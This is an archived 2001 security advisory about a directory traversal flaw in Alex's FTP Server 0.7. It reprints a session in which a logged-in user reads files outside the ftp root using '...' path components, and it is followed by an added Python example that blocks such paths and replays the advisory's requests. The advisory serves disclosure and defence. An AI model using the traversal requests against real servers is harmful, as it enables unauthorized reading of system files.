----- Begin Hush Signed Message from joetestaat_private -----

Vulnerabilities in Alex's FTP Server

Overview

Alex's Ftp Server v0.7 is an ftp server available from http://www.alex.feedback.net. Vulnerabilities exist which allow a logged-in user to break out of the ftp root by requesting paths that contain a '...' component, as the session below shows.

Details

The following is an illustration of the problem. An ftp root of 'c:\directory\directory' was used:

    Connected to xxxxxxxxxx.rh.rit.edu.
    220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Enter PASS command
    Password:
    230 Logged in
    ftp> get /.../autoexec.bat
    200 Port command okay
    150 Opening data connection for retr "/.../autoexec.bat"
    226 Transfer complete
    ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
    ftp> cd ...
    257 "/.../" is current directory
    ftp> get command.com
    200 Port command okay
    150 Opening data connection for retr "/.../command.com"
    226 Transfer complete
    ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
    ftp>

Solution

No quick fix is possible.

Vendor Status

Alex Linde was contacted via <alex.lindeat_private> on Friday, April 20, 2001. No reply was received.

- Joe Testa
e-mail: joetestaat_private
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron

----- Begin Hush Signature v1.3 -----
EQcZaZRY8qHbXEoNyX08XELi9dxKdjm2FqldEP7+Sl5CfDejO0PaPKe/uBYxHXEnkM2u
44EjodbwrUqAF7M64TA8mDMqpuUwx2NnDlCkvbLMMe5pbVUER/tFD2R4WdD/94j/vtU6
vLq31tg7Z3jKDgOasR3q9RUb9zsLWjN01FGjSwBQIy2pP+jBaK6Edt7O5oSU1OisSAbH
9IJF/nx9PovvNSqUqsmz/nbywYuN/CZTURgRfw584aKpidxKB+zrWrmq+wf/WzXxAooI
W3J7tpHQV2+Osu/f+w5HkS2yc2XWo6gcdAjOySGiA71OL18BLEF6avPFnKfUpFsE4NQ9
vVuYaI86jMyPlnJd2Rg9HYxxnU80Uu3s8ZLAIwLflbRqyDHk9P4Ivus5hQd0EDs5cjyE
ALYP9twX/Q86/5fz7qXFR/pJv6kmFr0eOKZdv1zOFES6eVYfdyJeLjhqbTa32BI/88l4
ywYMSBgRmg7W3eWWcs+FnGbzmMNX7sPUv9m5vIZjPtf/
----- End Hush Signature v1.3 -----

This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
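Editor's added example, not code from Joe Testa's post or from Alex's FTP Server. The session above shows the server passing a client-supplied path containing a '...' component straight through to the filesystem, where Windows resolves it to a parent directory. The Python below shows the server-side check an FTP daemon needs: every client path is resolved component by component against a virtual root before it touches the filesystem, with '..' handled explicitly, any longer run of dots rejected, and a final prefix check as defence in depth. The root directory (written 'C:/directory/directory' to stand in for the advisory's 'c:\directory\directory'), the function names and the request samples are all constructed for this example.

```python
"""Confining client-supplied FTP paths to the server root (added example)."""
import posixpath

# Constructed stand-in for the advisory's ftp root, written with forward
# slashes so the example behaves the same on any host.
FTP_ROOT = "C:/directory/directory"


class TraversalError(ValueError):
    """Raised when a client-supplied path would leave the FTP root."""


def virtual_path(cwd, requested):
    """Resolve `requested` against the client's virtual cwd ('/' = FTP root).

    Rules applied before anything reaches the filesystem:
      * '/' and '\\' are both separators (Windows accepts either);
      * '..' pops one level and is an error at the root;
      * any other all-dots component ('...', '....') is rejected outright,
        since no legitimate file or directory carries such a name and
        DOS-derived Windows treats it as a multi-level parent reference;
      * ':' (drive letters, NTFS streams) and NUL are rejected as well.
    """
    absolute = requested[:1] in ("/", "\\")
    base = requested if absolute else cwd + "/" + requested
    parts = []
    for comp in base.replace("\\", "/").split("/"):
        if comp in ("", "."):
            continue
        if ":" in comp or "\0" in comp:
            raise TraversalError("illegal character in component %r" % comp)
        if comp == "..":
            if not parts:
                raise TraversalError("path escapes FTP root: %r" % requested)
            parts.pop()
            continue
        if comp.count(".") == len(comp):  # '...', '....', and so on
            raise TraversalError("dots-only component %r in %r" % (comp, requested))
        parts.append(comp)
    return "/" + "/".join(parts)


def physical_path(root, cwd, requested):
    """Map a client path to a filesystem path under `root`, or raise."""
    phys = posixpath.normpath(root + virtual_path(cwd, requested))
    # Defence in depth: after component-wise resolution the result must still
    # be `root` itself or lie strictly beneath it.
    if phys != root and not phys.startswith(root.rstrip("/") + "/"):
        raise TraversalError("resolved outside root: %r" % phys)
    return phys


def is_confined(cwd, requested):
    """True if the request stays inside FTP_ROOT, False if it is rejected."""
    try:
        physical_path(FTP_ROOT, cwd, requested)
    except TraversalError:
        return False
    return True


def replay_advisory_session():
    """Run the requests from the post's transcript through the check.

    Returns a mapping of each request to the physical path the server would
    serve, or the word 'REJECTED'.  The first three requests are taken from
    the advisory's session; the last is a benign request for comparison.
    """
    requests = [
        ("/", "/.../autoexec.bat"),   # the 'get' that read autoexec.bat
        ("/", "..."),                 # the 'cd ...' that changed directory
        ("/.../", "command.com"),     # the second 'get', from the escaped cwd
        ("/", "pub/readme.txt"),      # benign request inside the root
    ]
    results = {}
    for cwd, req in requests:
        try:
            results[req] = physical_path(FTP_ROOT, cwd, req)
        except TraversalError:
            results[req] = "REJECTED"
    return results


if __name__ == "__main__":
    for req, outcome in replay_advisory_session().items():
        print("%-22s -> %s" % (req, outcome))
```

The deliberate choice here is to reject dots-only components longer than '..' rather than try to emulate how each Windows version interprets them; a confinement check should never have to guess at the filesystem's own canonicalization, which is why the final prefix test in `physical_path` is kept even though `virtual_path` already refuses every escape it knows about.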
This archive was generated by hypermail 2b30 : Mon Apr 30 2001 - 00:18:54 PDT